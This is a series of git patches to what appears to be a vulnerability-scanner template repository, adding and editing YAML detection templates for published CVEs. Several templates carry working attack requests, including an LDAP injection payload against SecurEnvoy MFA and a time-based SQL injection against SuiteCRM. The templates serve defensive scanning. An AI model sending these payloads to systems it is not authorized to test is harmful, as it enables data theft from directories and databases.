https://wpscan.com/vulnerability/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6786 + classification: + cve-id: CVE-2023-6786 metadata: - publicwww-query: inurl:"/wp-content/plugins/payment-gateway-for-telcell - tags: wpscan,wordpress,redirect,wp-plugin,cve,cve2023 + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/payment-gateway-for-telcell" + tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell http: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me" - redirects: true - max-redirects: 2 matchers: - type: regex part: header From 7f6a1ace745d6d623651b981cb25934e2ff9a0cc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 15:05:02 +0530 Subject: [PATCH 0099/1841] updated info --- http/cves/2023/CVE-2023-6505.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml index 53a0b8dbf1..7ab4bd7553 100644 --- a/http/cves/2023/CVE-2023-6505.yaml +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -1,17 +1,18 @@ id: CVE-2023-6505 info: - name: Prime Mover < 1.9.3 - Directory Listing to Sensitive Data Exposure + name: Prime Mover < 1.9.3 - Sensitive Data Exposure author: securityforeveryone.com severity: high description: | Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes. - remediation: Fixed in 1.9.3 + remediation: | + Fixed in 1.9.3 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-6505 - https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629 - https://research.cleantalk.org/cve-2023-6505-prime-mover-poc-exploit/ - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2023-6505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,10 +21,12 @@ info: epss-percentile: 0.36916 cpe: cpe:2.3:a:codexonics:prime_mover:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: codexonics product: prime_mover framework: wordpress - tags: wpscan,wordpress,exposure,cve,cve2023 + fofa-query: body="/wp-content/plugins/prime-mover" + tags: cve,cve2023,wp,wp-plugin,wordpress,exposure,prime-mover,listing http: - method: GET @@ -33,11 +36,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'Index of /wp-content/uploads/prime-mover-export-files/1' - '.wprime' condition: or - part: body - type: status status: From 532f8d400e29bbae8ea87c19e5794e1eee3f3f8e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 11 Jun 2024 13:28:44 +0300 Subject: [PATCH 0100/1841] cve-2024-37393 add --- http/cves/2024/CVE-2024-37393.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-37393.yaml diff --git a/http/cves/2024/CVE-2024-37393.yaml b/http/cves/2024/CVE-2024-37393.yaml new file mode 100644 index 0000000000..7017e64ef1 --- /dev/null +++ b/http/cves/2024/CVE-2024-37393.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-37393 +info: + name: SecurEnvoy MFA LDAP Injection + author: securityforeveryone.com + severity: critical + description: | + Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature. + reference: + - https://www.tenable.com/cve/CVE-2024-37393 + - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393 + - https://securenvoy.com + tags: cve,cve2024,SecurEnvoy,ldap +variables: + userid: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /secserver/? HTTP/2 + Host: {{Hostname}} + + FLAG=DESKTOP + 1 + STATUS:INIT + USERID:{{userid}})(sAMAccountName=* + MEMBEROF:Domain Users + + - | + POST /secserver/? HTTP/2 + Host: {{Hostname}} + + FLAG=DESKTOP + 1 + STATUS:INIT + USERID:*)(sAMAccountName=* + MEMBEROF:Domain Users + + matchers: + - type: dsl + dsl: + - "contains(body_1, 'Error checking Group')" + - "status_code_1 == 200" + - "contains(body_2, 'GETPASSCODE')" + - "status_code_2 == 200" + condition: and From 8c88634a2f20c4760d34fce27c5241515948220e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 16:16:46 +0530 Subject: [PATCH 0101/1841] updated matchers and req --- http/exposed-panels/oracle-application-server-panel.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index c7ee1bc56c..cd39f4d7d0 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -1,7 +1,7 @@ id: oracle-application-server-panel info: - name: Oracle Application Server Login Panel - Detect + name: Oracle Application Server Panel - Detect author: righettod severity: info description: | @@ -18,6 +18,11 @@ http: - method: GET path: - "{{BaseURL}}/em/console/ias/oc4j/home" + - "{{BaseURL}}" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers: - type: dsl From 378d9df2afd3405ca7a8655d4c443bb57e93df14 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 10:57:25 +0000 Subject: [PATCH 0102/1841] Auto Generated New Template Addition List [Tue Jun 11 10:57:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8a07a01e1b..3e63f56b89 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ http/cves/2023/CVE-2023-38194.yaml +http/exposed-panels/oracle-application-server-panel.yaml From d7507cd68e8284c7140925534ffb64fccfde4c30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 10:57:30 +0000 Subject: [PATCH 0103/1841] Auto Generated Templates Checksum [Tue Jun 11 10:57:30 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0991629cb3..e4c03291af 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4206,6 +4206,7 @@ http/exposed-panels/openwrt-login.yaml:02835853df67ba3e6ea1fbe2c3be8843c2a407b3 http/exposed-panels/openx-panel.yaml:3774c5c5c1e2a7caa2b39db7861fcdc76703e198 http/exposed-panels/opinio-panel.yaml:12e7ff620ba48be41041e69d29540be880124b16 http/exposed-panels/oracle-access-management.yaml:fcbfc34e8c844436c6ab5bc7880885da946e48b4 +http/exposed-panels/oracle-application-server-panel.yaml:b2e727e1f9041ea842a8d033b006d631e1d7191b http/exposed-panels/oracle-business-control.yaml:4577f0690dc1b4ab93fa5d411666e34c94ef027c http/exposed-panels/oracle-business-intelligence.yaml:996e0ae7577d365ca72badd9770eda29d4b9ce86 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -8633,7 +8634,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:509100267f6987484ecd16418331c37dc006db7f +templates-checksum.txt:0e6b28cd4ce72e63eb8dc527cd80c982aa24f994 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7e21094b3a15c1ee7257f3e8f2d935116068c960 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 10:58:16 +0000 Subject: [PATCH 0104/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e7941ad5d2..a066fbeecf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2023/CVE-2023-38194.yaml' + - 'http/exposed-panels/oracle-application-server-panel.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 3f2627747c814ed6cb493b343c0615c8210b0f56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 10:59:10 +0000 Subject: [PATCH 0105/1841] Auto Template Signing [Tue Jun 11 10:59:10 UTC 2024] :robot: --- http/exposed-panels/oracle-application-server-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index cd39f4d7d0..9e119a5445 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -36,3 +36,4 @@ http: group: 1 regex: - '(?i)Copyright\s+©\s+([0-9,\s]+),\s+Oracle' +# digest: 4a0a00473045022100b5e77797f9eae4009f93063d3efcfe86e925c29a78b7bea924eb20b33a306238022056292a2ea5cb1b94ea724d63ea9f73e8be4207bb5e00e45cc499c3f7cc98f401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 722b9b2d6a89dee7211ebf7e7c788bf7a4f16efd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 16:55:32 +0530 Subject: [PATCH 0106/1841] Fix FP CVE-2018-18778.yaml --- http/cves/2018/CVE-2018-18778.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 23d5c6f885..9a7d93f525 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -33,6 +33,8 @@ info: - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme +flow: http(1) && http(2) + http: - method: GET path: @@ -43,6 +45,7 @@ http: part: header words: - "Server: mini_httpd" + internal: true - raw: - |+ @@ -60,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950 From 6091f89bfbdf1b82e53d47269872e7ed6f4c1a1d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 16:59:08 +0530 Subject: [PATCH 0107/1841] Update and rename CVE-2024-23692 to CVE-2024-23692.yaml --- http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) rename http/cves/2024/{CVE-2024-23692 => CVE-2024-23692.yaml} (83%) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692.yaml similarity index 83% rename from http/cves/2024/CVE-2024-23692 rename to http/cves/2024/CVE-2024-23692.yaml index aa8c5c5096..97807850d9 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692.yaml @@ -9,11 +9,16 @@ info: reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23692 + cwe-id: CWE-1336 metadata: verified: true max-request: 1 shodan-query: product:"HttpFileServer httpd" - tags: cve,cve2024,hfs,rce + tags: cve,cve2024,hfs,rejetto,rce http: - method: GET From 5df5911d6817aae9eda08d9196e39d6fe9e84ffc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 11:32:28 +0000 Subject: [PATCH 0108/1841] Auto Generated New Template Addition List [Tue Jun 11 11:32:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3e63f56b89..8265251dc2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2023/CVE-2023-38194.yaml +http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml From a94258f99b35c75e8876661bcc8ab018fa07245f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 11:32:33 +0000 Subject: [PATCH 0109/1841] Auto Generated Templates Checksum [Tue Jun 11 11:32:33 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e4c03291af..99780c28ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3279,6 +3279,7 @@ http/cves/2024/CVE-2024-22320.yaml:ad6b1653488c3e9ea8fc758d98c75a6c1c54c076 http/cves/2024/CVE-2024-22927.yaml:3a251aad259433eed60185c8cebe1cfae50825a8 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 +http/cves/2024/CVE-2024-23692.yaml:0add16a7a4ce5c650e56df1f6e59ee1c23b7bf27 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c @@ -4206,7 +4207,7 @@ http/exposed-panels/openwrt-login.yaml:02835853df67ba3e6ea1fbe2c3be8843c2a407b3 http/exposed-panels/openx-panel.yaml:3774c5c5c1e2a7caa2b39db7861fcdc76703e198 http/exposed-panels/opinio-panel.yaml:12e7ff620ba48be41041e69d29540be880124b16 http/exposed-panels/oracle-access-management.yaml:fcbfc34e8c844436c6ab5bc7880885da946e48b4 -http/exposed-panels/oracle-application-server-panel.yaml:b2e727e1f9041ea842a8d033b006d631e1d7191b +http/exposed-panels/oracle-application-server-panel.yaml:f228ef854ad26a774b190f1422afbbe1d1aef1a3 http/exposed-panels/oracle-business-control.yaml:4577f0690dc1b4ab93fa5d411666e34c94ef027c http/exposed-panels/oracle-business-intelligence.yaml:996e0ae7577d365ca72badd9770eda29d4b9ce86 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -8634,7 +8635,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0e6b28cd4ce72e63eb8dc527cd80c982aa24f994 +templates-checksum.txt:ccf1f69a26ab148ef4c9f3890680c80b0d35f04b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d29b15eb085802a8b77361c8b1242a86994218c7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 11:33:17 +0000 Subject: [PATCH 0110/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a066fbeecf..ea12c1681f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2023/CVE-2023-38194.yaml' + - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' workflow_dispatch: jobs: From a133524bc888d85e0344997f0b5a86138bbd2706 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 11:34:31 +0000 Subject: [PATCH 0111/1841] Auto Template Signing [Tue Jun 11 11:34:31 UTC 2024] :robot: --- http/cves/2024/CVE-2024-23692.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-23692.yaml b/http/cves/2024/CVE-2024-23692.yaml index 97807850d9..0065592c49 100644 --- a/http/cves/2024/CVE-2024-23692.yaml +++ b/http/cves/2024/CVE-2024-23692.yaml @@ -36,3 +36,4 @@ http: part: body words: - "rejetto" +# digest: 4b0a00483046022100b9a14758a1d4c7e1141e672f3b672defcadb9519c76b6097f97447664b207dd9022100a289dba646ba9b3f9b044ec5a7c73804d94b8b4c5ff776df5650975fbbe80a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c9adff71df4bc012f04686f43d99e24257512cef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 11 Jun 2024 17:12:14 +0530 Subject: [PATCH 0112/1841] updated info & matcher --- http/cves/2021/CVE-2021-38147.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index 412cce14cd..c3e5eb9663 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -1,16 +1,17 @@ id: CVE-2021-38147 info: - name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download + name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure author: securityforeveryone severity: high description: | Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel. - remediation: Fixed In v21.4.0 + remediation: | + Fixed In v21.4.0 reference: - - https://www.wipro.com/holmes/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-38147 - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-38147 + - https://www.wipro.com/holmes/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,8 +21,10 @@ info: epss-percentile: 0.76242 cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* metadata: + max-request: 4 vendor: wipro product: holmes + fofa-query: title="Holmes Orchestrator" tags: cve,cve2021,wipro,holmes,orchestrator http: @@ -36,7 +39,7 @@ http: matchers: - type: dsl dsl: + - "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')" - "contains(body, ' Date: Tue, 11 Jun 2024 11:45:25 +0000 Subject: [PATCH 0113/1841] Auto Generated Templates Checksum [Tue Jun 11 11:45:25 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 99780c28ee..fb4713f24a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2270,6 +2270,7 @@ http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc http/cves/2021/CVE-2021-37833.yaml:e9cbdfefbc2426c4c32a98d8605f766ade0bcee1 +http/cves/2021/CVE-2021-38147.yaml:67956793f1feedef65a6d4f5c208af78ce43e8d3 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 http/cves/2021/CVE-2021-38540.yaml:00b59f51b8b6bd546ae1443467b4c6cd318fef28 http/cves/2021/CVE-2021-38647.yaml:d3f362730e7af913985dc415c806983d72f4f665 @@ -3279,7 +3280,7 @@ http/cves/2024/CVE-2024-22320.yaml:ad6b1653488c3e9ea8fc758d98c75a6c1c54c076 http/cves/2024/CVE-2024-22927.yaml:3a251aad259433eed60185c8cebe1cfae50825a8 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 -http/cves/2024/CVE-2024-23692.yaml:0add16a7a4ce5c650e56df1f6e59ee1c23b7bf27 +http/cves/2024/CVE-2024-23692.yaml:aed80d269b633036a75391e6e5524265d83714d8 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c @@ -8635,7 +8636,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ccf1f69a26ab148ef4c9f3890680c80b0d35f04b +templates-checksum.txt:1e275e8814951a34dea9c484b92832ec958bed6d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d1819b6050047432608a7488be62a0554150586c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 11:47:12 +0000 Subject: [PATCH 0114/1841] Auto Template Signing [Tue Jun 11 11:47:12 UTC 2024] :robot: --- http/cves/2021/CVE-2021-38147.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index c3e5eb9663..0339d2e904 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -43,3 +43,4 @@ http: - "contains(body, ' Date: Tue, 11 Jun 2024 17:18:52 +0530 Subject: [PATCH 0115/1841] Update CVE-2021-38146.yaml --- http/cves/2021/CVE-2021-38146.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index 3a45ad8ac8..e0dd4a4dbc 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -8,10 +8,10 @@ info: The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data. remediation: Fixed In v21.4.0 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-38146 - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html - https://flippingbitz.com/post/wipro-ho-2041-cve/ - https://www.wipro.com/holmes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-38146 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -25,7 +25,7 @@ info: vendor: wipro product: holmes fofa-query: title="Wipro Holmes Orchestrator" - tags: cve,cve2021,packetstorm,wipro,lfi + tags: cve,cve2021,wipro,holmes,lfi http: - method: POST From 992ffd837ba1333e60bc33b15cac3fba82b1379b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 11:52:15 +0000 Subject: [PATCH 0116/1841] Auto Generated New Template Addition List [Tue Jun 11 11:52:15 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 8265251dc2..b7c20e8967 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,5 @@ +http/cves/2021/CVE-2021-38146.yaml +http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml From c6930d8bcc9d9bcd6c8edafa7247606035963b17 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 11:53:02 +0000 Subject: [PATCH 0117/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ea12c1681f..e8aebdd613 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,8 @@ on: push: paths: - '.new-additions' + - 'http/cves/2021/CVE-2021-38146.yaml' + - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 5eeb50d6a66db476e690e74ae34d83899a9b869a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 11:54:03 +0000 Subject: [PATCH 0118/1841] Auto Template Signing [Tue Jun 11 11:54:03 UTC 2024] :robot: --- http/cves/2021/CVE-2021-38146.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index e0dd4a4dbc..2312f95dfd 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -53,3 +53,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022022d15569ab9142630935d44402f8f46cca7954122a02f564f040e69e9b280728022020380f3ba30a627ae60d45fc005975c1039e49de20d38fb43147b7ef6533bbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5cc95b43be6440808d7da4d01c45b18a566a78d Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 11 Jun 2024 17:58:02 +0300 Subject: [PATCH 0119/1841] add cve-2024-36412 --- http/cves/2024/CVE-2024-36412.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36412.yaml diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml new file mode 100644 index 0000000000..2728bf88e2 --- /dev/null +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -0,0 +1,32 @@ +id: CVE-2024-36412 + +info: + name: SuiteCRM SQL Injection + author: securityforeveryone.com + severity: critical + description: | + SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue. + remediation: 7.14.4 and 8.6.1 + reference: + - https://0x5001.com/web-security/cve-2024-36412-proof-of-concept + - https://www.tenable.com/cve/CVE-2024-36412 + tags: SuiteCRM,cve,cve2024 + +http: + - method: GET + path: + - '{{BaseURL}}/index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(4);--+-&type=c&response=accept' + + matchers-condition: and + matchers: + - type: word + words: + - "You have already responded to the invitation or there was a problem with the link. Please contact the sender of the invite for help" + - "Thank you for accepting" + condition: or + + - type: dsl + dsl: + - 'duration>=4' + - 'status_code == 200' + condition: and From d845a25ef7b94471146c8c35bc793b4bfe2d5ffd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 15:44:34 +0000 Subject: [PATCH 0121/1841] Auto Generated Templates Checksum [Tue Jun 11 15:44:34 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fb4713f24a..6094a1770d 100644 --- 